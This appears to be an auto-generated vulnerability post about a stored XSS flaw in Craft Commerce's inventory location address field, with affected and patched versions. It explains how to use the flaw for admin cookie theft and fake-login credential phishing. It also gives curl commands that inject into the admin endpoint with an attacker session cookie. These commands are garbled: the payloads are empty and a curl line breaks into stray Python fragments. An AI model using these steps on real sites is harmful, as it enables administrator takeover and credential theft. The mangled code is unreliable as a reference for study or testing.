Listen to this Post
The vulnerability is a stored cross-site scripting (XSS) flaw in Craft Commerce’s inventory management system. Specifically, the ‘Address Line 1’ field in Inventory Locations does not undergo proper input sanitization or output encoding. When an attacker with appropriate permissions, such as a user who can edit inventory locations, injects a malicious JavaScript payload into this field, it is stored in the database. Later, when an administrator or any user with access to the admin panel views the inventory location details, the payload is rendered and executed in their browser. This execution occurs in the context of the admin session, which typically has elevated privileges. The attacker can leverage this to perform actions on behalf of the administrator, such as stealing session cookies, redirecting to malicious sites, or injecting further code. For privilege escalation, the attacker can use the XSS to create a fake login modal that mimics the Craft CMS login page. Since the modal appears on the trusted domain, administrators may enter their credentials, which are then sent to the attacker’s server. Alternatively, the attacker can automate session theft by forcing logout and capturing new session tokens. This vulnerability requires the attacker to have initial access to edit inventory locations, but once exploited, it can lead to full administrative control. The issue affects Craft Commerce versions 4.0.0-RC1 through 4.10.0 and 5.0.0-RC1 through 5.5.1. Patched versions are 4.10.1 and 5.5.2, which implement proper sanitization for the address field.
Platform: Craft Commerce
Version: 5.0.0-5.5.1, 4.0.0-4.10.0
Vulnerability: Stored XSS
Severity: Moderate
Date: Feb 2, 2026
Prediction: Patched Feb 2, 2026
What Undercode Say:
Analytics:
curl -X POST ‘https://target.com/admin/commerce/inventory-locations’ -H ‘Cookie: session=attacker_session’ -d “address_line_1=”
curl -s ‘https://target.com/admin/commerce/inventory-locations/1’ | grep -q “'; response=requests.post('https://target.com/admin/commerce/inventory-locations', data={'address_line_1':payload}, cookies={'session':'attacker_cookie'}); print('Injection attempted')"
How Exploit:
Inject malicious script into 'Address Line 1' field. Execute payload in admin browser. Steal cookies or fake login.
Protection from this CVE:
Update to patched versions. Implement input validation. Use CSP headers.
Impact:
Privilege escalation to administrator. Data theft. System compromise.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

